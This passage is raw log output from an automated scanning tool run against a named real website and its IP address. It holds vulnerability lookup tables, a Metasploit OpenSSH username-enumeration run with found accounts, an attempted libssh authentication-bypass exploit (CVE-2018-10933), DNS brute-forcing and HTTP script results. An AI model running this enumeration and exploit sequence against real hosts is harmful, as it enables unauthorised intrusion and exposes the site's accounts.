564| [861012] Fedora Update for openssh FEDORA-2007-715
565| [840345] Ubuntu Update for openssh vulnerability USN-597-1
566| [840300] Ubuntu Update for openssh update USN-612-5
567| [840271] Ubuntu Update for openssh vulnerability USN-612-2
568| [840268] Ubuntu Update for openssh update USN-612-7
569| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
570| [840214] Ubuntu Update for openssh vulnerability USN-566-1
571| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
572| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
573| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
574| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
575| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
576| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
577| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
578| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
579| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
580| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
581| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
582| [100584] OpenSSH X Connections Session Hijacking Vulnerability
583| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
584| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
585| [65987] SLES10: Security update for OpenSSH
586| [65819] SLES10: Security update for OpenSSH
587| [65514] SLES9: Security update for OpenSSH
588| [65513] SLES9: Security update for OpenSSH
589| [65334] SLES9: Security update for OpenSSH
590| [65248] SLES9: Security update for OpenSSH
591| [65218] SLES9: Security update for OpenSSH
592| [65169] SLES9: Security update for openssh,openssh-askpass
593| [65126] SLES9: Security update for OpenSSH
594| [65019] SLES9: Security update for OpenSSH
595| [65015] SLES9: Security update for OpenSSH
596| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
597| [61639] Debian Security Advisory DSA 1638-1 (openssh)
598| [61030] Debian Security Advisory DSA 1576-2 (openssh)
599| [61029] Debian Security Advisory DSA 1576-1 (openssh)
600| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
601| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
602| [60667] Slackware Advisory SSA:2008-095-01 openssh
603| [59014] Slackware Advisory SSA:2007-255-01 openssh
604| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
605| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
606| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
607| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
608| [57492] Slackware Advisory SSA:2006-272-02 openssh
609| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
610| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
611| [57470] FreeBSD Ports: openssh
612| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
613| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
614| [56294] Slackware Advisory SSA:2006-045-06 openssh
615| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
616| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
617| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
618| [53788] Debian Security Advisory DSA 025-1 (openssh)
619| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
620| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
621| [11343] OpenSSH Client Unauthorized Remote Forwarding
622| [10954] OpenSSH AFS/Kerberos ticket/token passing
623| [10883] OpenSSH Channel Code Off by 1
624| [10823] OpenSSH UseLogin Environment Variables
625|
626| SecurityTracker - https://www.securitytracker.com:
627| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
628| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
629| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
630| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
631| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
632| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
633| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
634| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
635| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
636| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
637| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
638| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
639| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
640| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
641| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
642| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
643| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
644| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
645| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
646| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
647| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
648| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
649| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
650| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
651| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
652| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
653| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
654| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
655| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
656| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
657| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
658| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
659| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
660| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
661| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
662| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
663| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
664| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
665|
666| OSVDB - http://www.osvdb.org:
667| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
668| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
669| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
670| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
671| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
672| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
673| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
674| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
675| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
676| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
677| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
678| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
679| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
680| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
681| [56921] OpenSSH Unspecified Remote Compromise
682| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
683| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
684| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
685| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
686| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
687| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
688| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
689| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
690| [43745] OpenSSH X11 Forwarding Local Session Hijacking
691| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
692| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
693| [37315] pam_usb OpenSSH Authentication Unspecified Issue
694| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
695| [34601] OPIE w/ OpenSSH Account Enumeration
696| [34600] OpenSSH S/KEY Authentication Account Enumeration
697| [32721] OpenSSH Username Password Complexity Account Enumeration
698| [30232] OpenSSH Privilege Separation Monitor Weakness
699| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
700| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
701| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
702| [29152] OpenSSH Identical Block Packet DoS
703| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
704| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
705| [22692] OpenSSH scp Command Line Filename Processing Command Injection
706| [20216] OpenSSH with KerberosV Remote Authentication Bypass
707| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
708| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
709| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
710| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
711| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
712| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
713| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
714| [6601] OpenSSH *realloc() Unspecified Memory Errors
715| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
716| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
717| [6072] OpenSSH PAM Conversation Function Stack Modification
718| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
719| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
720| [5408] OpenSSH echo simulation Information Disclosure
721| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
722| [4536] OpenSSH Portable AIX linker Privilege Escalation
723| [3938] OpenSSL and OpenSSH /dev/random Check Failure
724| [3456] OpenSSH buffer_append_space() Heap Corruption
725| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
726| [2140] OpenSSH w/ PAM Username Validity Timing Attack
727| [2112] OpenSSH Reverse DNS Lookup Bypass
728| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
729| [1853] OpenSSH Symbolic Link 'cookies' File Removal
730| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
731| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
732| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
733| [688] OpenSSH UseLogin Environment Variable Local Command Execution
734| [642] OpenSSH Multiple Key Type ACL Bypass
735| [504] OpenSSH SSHv2 Public Key Authentication Bypass
736| [341] OpenSSH UseLogin Local Privilege Escalation
737|_
738Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
739Aggressive OS guesses: Linux 3.10 - 3.12 (98%), Linux 4.4 (98%), Linux 4.9 (98%), Linux 3.18 (98%), Linux 2.6.32 (97%), Linux 2.6.32 or 3.10 (97%), Linux 2.6.35 (97%), Linux 2.6.39 (97%), Linux 3.7 (97%), Synology DiskStation Manager 5.1 (97%)
740No exact OS matches for host (test conditions non-ideal).
741
742TRACEROUTE
743HOP RTT ADDRESS
7441 130.47 ms box6011.bluehost.com (216.172.168.193)
745
746OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
747Nmap done: 1 IP address (1 host up) scanned in 25.53 seconds
748[92m====================================================================================[0m
749[91m RUNNING SSH VERSION SCANNER [0m
750[92m====================================================================================[0m
751[1m[31m[-][0m ***
752[1m[31m[-][0m * WARNING: No database support: could not connect to server: Connection refused
753 Is the server running on host "localhost" (::1) and accepting
754 TCP/IP connections on port 5432?
755could not connect to server: Connection refused
756 Is the server running on host "localhost" (127.0.0.1) and accepting
757 TCP/IP connections on port 5432?
758
759[1m[31m[-][0m ***
760[0mUSER_FILE => /usr/share/brutex/wordlists/simple-users.txt
761[0mRHOSTS => www.rhkpa.org
762[0mRHOST => www.rhkpa.org
763[0m[0m[1m[34m[*][0m www.rhkpa.org:22 - Scanned 1 of 1 hosts (100% complete)
764[1m[34m[*][0m Auxiliary module execution completed
765[0m[92m====================================================================================[0m
766[91m RUNNING OPENSSH USER ENUM SCANNER [0m
767[92m====================================================================================[0m
768[1m[31m[-][0m ***
769[1m[31m[-][0m * WARNING: No database support: could not connect to server: Connection refused
770 Is the server running on host "localhost" (::1) and accepting
771 TCP/IP connections on port 5432?
772could not connect to server: Connection refused
773 Is the server running on host "localhost" (127.0.0.1) and accepting
774 TCP/IP connections on port 5432?
775
776[1m[31m[-][0m ***
777[0mUSER_FILE => /usr/share/brutex/wordlists/simple-users.txt
778[0mRHOSTS => www.rhkpa.org
779[0mRHOST => www.rhkpa.org
780[0m[0m[1m[34m[*][0m 216.172.168.193:22 - SSH - Using malformed packet technique
781[1m[34m[*][0m 216.172.168.193:22 - SSH - Starting scan
782[1m[32m[+][0m 216.172.168.193:22 - SSH - User 'admin' found
783[1m[32m[+][0m 216.172.168.193:22 - SSH - User 'administrator' found
784[1m[32m[+][0m 216.172.168.193:22 - SSH - User 'anonymous' found
785[1m[32m[+][0m 216.172.168.193:22 - SSH - User 'backup' found
786[1m[32m[+][0m 216.172.168.193:22 - SSH - User 'bee' found
787[1m[32m[+][0m 216.172.168.193:22 - SSH - User 'ftp' found
788[1m[32m[+][0m 216.172.168.193:22 - SSH - User 'guest' found
789[1m[32m[+][0m 216.172.168.193:22 - SSH - User 'GUEST' found
790[1m[32m[+][0m 216.172.168.193:22 - SSH - User 'info' found
791[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'mail' on could not connect
792[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'mailadmin' on could not connect
793[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'msfadmin' on could not connect
794[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'mysql' on could not connect
795[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'nobody' on could not connect
796[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'oracle' on could not connect
797[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'owaspbwa' on could not connect
798[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'postfix' on could not connect
799[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'postgres' on could not connect
800[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'private' on could not connect
801[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'proftpd' on could not connect
802[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'public' on could not connect
803[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'root' on could not connect
804[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'superadmin' on could not connect
805[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'support' on could not connect
806[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'sys' on could not connect
807[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'system' on could not connect
808[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'systemadmin' on could not connect
809[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'systemadministrator' on could not connect
810[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'test' on could not connect
811[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'tomcat' on could not connect
812[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'user' on could not connect
813[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'webmaster' on could not connect
814[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'www-data' on could not connect
815[1m[31m[-][0m 216.172.168.193:22 - SSH - User 'Fortimanager_Access' on could not connect
816[1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
817[1m[34m[*][0m Auxiliary module execution completed
818[0m[92m====================================================================================[0m
819[91m RUNNING LIBSSH AUTH BYPASS EXPLOIT CVE-2018-10933 [0m
820[92m====================================================================================[0m
821[1m[31m[-][0m ***
822[1m[31m[-][0m * WARNING: No database support: could not connect to server: Connection refused
823 Is the server running on host "localhost" (::1) and accepting
824 TCP/IP connections on port 5432?
825could not connect to server: Connection refused
826 Is the server running on host "localhost" (127.0.0.1) and accepting
827 TCP/IP connections on port 5432?
828
829[1m[31m[-][0m ***
830[0mRHOSTS => www.rhkpa.org
831[0mRHOST => www.rhkpa.org
832[0mLHOST => 127.0.0.1
833[0mLPORT => 4444
834[0m[0m[1m[34m[*][0m 216.172.168.193:22 - Attempting authentication bypass
835[1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
836[1m[34m[*][0m Auxiliary module execution completed
837[0m[91m + -- --=[Port 23 closed... skipping.[0m
838[91m + -- --=[Port 25 closed... skipping.[0m
839[93m + -- --=[Port 53 opened... running tests...[0m
840[92m====================================================================================[0m
841[91m RUNNING NMAP SCRIPTS [0m
842[92m====================================================================================[0m
843Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:10 UTC
844Nmap scan report for www.rhkpa.org (216.172.168.193)
845Host is up (0.093s latency).
846rDNS record for 216.172.168.193: box6011.bluehost.com
847
848PORT STATE SERVICE VERSION
84953/tcp open tcpwrapped
850| dns-nsec3-enum:
851|_ DNSSEC NSEC3 not supported
852Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
853Aggressive OS guesses: Linux 2.6.32 (97%), Linux 2.6.35 (97%), Linux 3.10 (97%), Linux 3.4 (97%), Linux 3.5 (97%), Linux 3.7 (97%), Linux 4.2 (97%), Linux 4.4 (97%), Synology DiskStation Manager 5.1 (97%), Linux 3.1 - 3.2 (97%)
854No exact OS matches for host (test conditions non-ideal).
855
856Host script results:
857| dns-brute:
858| DNS Brute-force hostnames:
859| www.rhkpa.org - 216.172.168.193
860|_ ftp.rhkpa.org - 216.172.168.193
861
862TRACEROUTE
863HOP RTT ADDRESS
8641 93.09 ms box6011.bluehost.com (216.172.168.193)
865
866OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
867Nmap done: 1 IP address (1 host up) scanned in 610.36 seconds
868[91m + -- --=[Port 67 closed... skipping.[0m
869[91m + -- --=[Port 68 closed... skipping.[0m
870[91m + -- --=[Port 69 closed... skipping.[0m
871[91m + -- --=[Port 79 closed... skipping.[0m
872[93m + -- --=[Port 80 opened... running tests...[0m
873[92m====================================================================================[0m
874[91m RUNNING NMAP HTTP SCRIPTS [0m
875[92m====================================================================================[0m
876Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:20 UTC
877NSE: Loaded 164 scripts for scanning.
878NSE: Script Pre-scanning.
879Initiating NSE at 13:20
880Completed NSE at 13:20, 0.00s elapsed
881Initiating NSE at 13:20
882Completed NSE at 13:20, 0.00s elapsed
883Initiating Parallel DNS resolution of 1 host. at 13:20
884Completed Parallel DNS resolution of 1 host. at 13:20, 0.08s elapsed
885Initiating SYN Stealth Scan at 13:20
886Scanning www.rhkpa.org (216.172.168.193) [1 port]
887Discovered open port 80/tcp on 216.172.168.193
888Completed SYN Stealth Scan at 13:20, 0.15s elapsed (1 total ports)
889Initiating Service scan at 13:20
890Scanning 1 service on www.rhkpa.org (216.172.168.193)
891Completed Service scan at 13:20, 5.59s elapsed (1 service on 1 host)
892Initiating OS detection (try #1) against www.rhkpa.org (216.172.168.193)
893Retrying OS detection (try #2) against www.rhkpa.org (216.172.168.193)
894NSE: Script scanning 216.172.168.193.
895Initiating NSE at 13:20
896NSE Timing: About 42.81% done; ETC: 13:21 (0:00:41 remaining)
897NSE Timing: About 84.19% done; ETC: 13:23 (0:00:30 remaining)
898NSE Timing: About 83.33% done; ETC: 13:24 (0:00:38 remaining)
899NSE Timing: About 83.16% done; ETC: 13:25 (0:00:46 remaining)
900NSE Timing: About 83.95% done; ETC: 13:26 (0:00:53 remaining)
901NSE Timing: About 83.77% done; ETC: 13:27 (0:01:04 remaining)
902Completed NSE at 13:30, 600.96s elapsed
903Initiating NSE at 13:30
904Completed NSE at 13:30, 3.01s elapsed
905Nmap scan report for www.rhkpa.org (216.172.168.193)
906Host is up (0.092s latency).
907rDNS record for 216.172.168.193: box6011.bluehost.com
908
909PORT STATE SERVICE VERSION
91080/tcp open http nginx 1.14.1
911|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
912| http-brute:
913|_ Path "/" does not require authentication
914|_http-chrono: Request times for /; avg: 3526.78ms; min: 1070.63ms; max: 5825.42ms
915|_http-csrf: Couldn't find any CSRF vulnerabilities.
916|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
917|_http-dombased-xss: Couldn't find any DOM based XSS.
918|_http-errors: Couldn't find any error pages.
919|_http-feed: Couldn't find any feeds.
920|_http-fetch: Please enter the complete path of the directory to save data in.
921| http-headers:
922| Server: nginx/1.14.1
923| Date: Wed, 02 Oct 2019 13:26:33 GMT
924| Content-Type: text/html; charset=UTF-8
925| Transfer-Encoding: chunked
926| Connection: close
927| Expires: Thu, 19 Nov 1981 08:52:00 GMT
928| Cache-Control: no-store, no-cache, must-revalidate
929| Pragma: no-cache
930| X-Redirect-By: WordPress
931| Set-Cookie: PHPSESSID=raciocdpvjmrrs03sdufnl2rj3; path=/
932| Set-Cookie: pmpro_visit=1; path=/
933| Location: https://www.rhkpa.org/
934| X-Server-Cache: true
935| X-Proxy-Cache: EXPIRED
936|
937|_ (Request type: GET)
938|_http-jsonp-detection: Couldn't find any JSONP endpoints.
939|_http-mobileversion-checker: ERROR: Script execution failed (use -d to debug)
940|_http-security-headers:
941|_http-server-header: nginx/1.14.1
942| http-sitemap-generator:
943| Directory structure:
944| Longest directory structure:
945| Depth: 0
946| Dir: /
947| Total files found (by extension):
948|_
949|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
950|_http-traceroute: ERROR: Script execution failed (use -d to debug)
951|_http-userdir-enum: Potential Users: root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test
952| http-vhosts:
953| 76 names had status ERROR
954|_51 names had status 200
955|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
956|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
957|_http-xssed: No previously reported XSS vuln.
958| vulscan: VulDB - https://vuldb.com:
959| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
960| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
961| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
962|
963| MITRE CVE - https://cve.mitre.org:
964| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
965| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
966| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
967| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
968| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
969| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
970|
971| SecurityFocus - https://www.securityfocus.com/bid/:
972| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
973| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
974| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
975| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
976| [82230] nginx Multiple Denial of Service Vulnerabilities
977| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
978| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
979| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
980| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
981| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
982| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
983| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
984| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
985| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
986| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
987| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
988| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
989| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
990| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
991| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
992| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
993| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
994| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
995| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
996| [40420] nginx Directory Traversal Vulnerability
997| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
998| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
999| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
1000| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
1001| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
1002|
1003| IBM X-Force - https://exchange.xforce.ibmcloud.com:
1004| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
1005| [84172] nginx denial of service
1006| [84048] nginx buffer overflow
1007| [83923] nginx ngx_http_close_connection() integer overflow
1008| [83688] nginx null byte code execution
1009| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
1010| [82319] nginx access.log information disclosure
1011| [80952] nginx SSL spoofing
1012| [77244] nginx and Microsoft Windows request security bypass
1013| [76778] Naxsi module for Nginx nx_extract.py directory traversal
1014| [74831] nginx ngx_http_mp4_module.c buffer overflow
1015| [74191] nginx ngx_cpystrn() information disclosure
1016| [74045] nginx header response information disclosure
1017| [71355] nginx ngx_resolver_copy() buffer overflow
1018| [59370] nginx characters denial of service
1019| [59369] nginx DATA source code disclosure
1020| [59047] nginx space source code disclosure
1021| [58966] nginx unspecified directory traversal
1022| [54025] nginx ngx_http_parse.c denial of service
1023| [53431] nginx WebDAV component directory traversal
1024| [53328] Nginx CRC-32 cached domain name spoofing
1025| [53250] Nginx ngx_http_parse_complex_uri() function code execution
1026|
1027| Exploit-DB - https://www.exploit-db.com:
1028| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
1029| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
1030| [25499] nginx 1.3.9-1.4.0 DoS PoC
1031|
1032| OpenVAS (Nessus) - http://www.openvas.org:
1033| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
1034| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
1035| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
1036| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
1037| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
1038| [64869] Debian Security Advisory DSA 1884-1 (nginx)
1039|
1040| SecurityTracker - https://www.securitytracker.com:
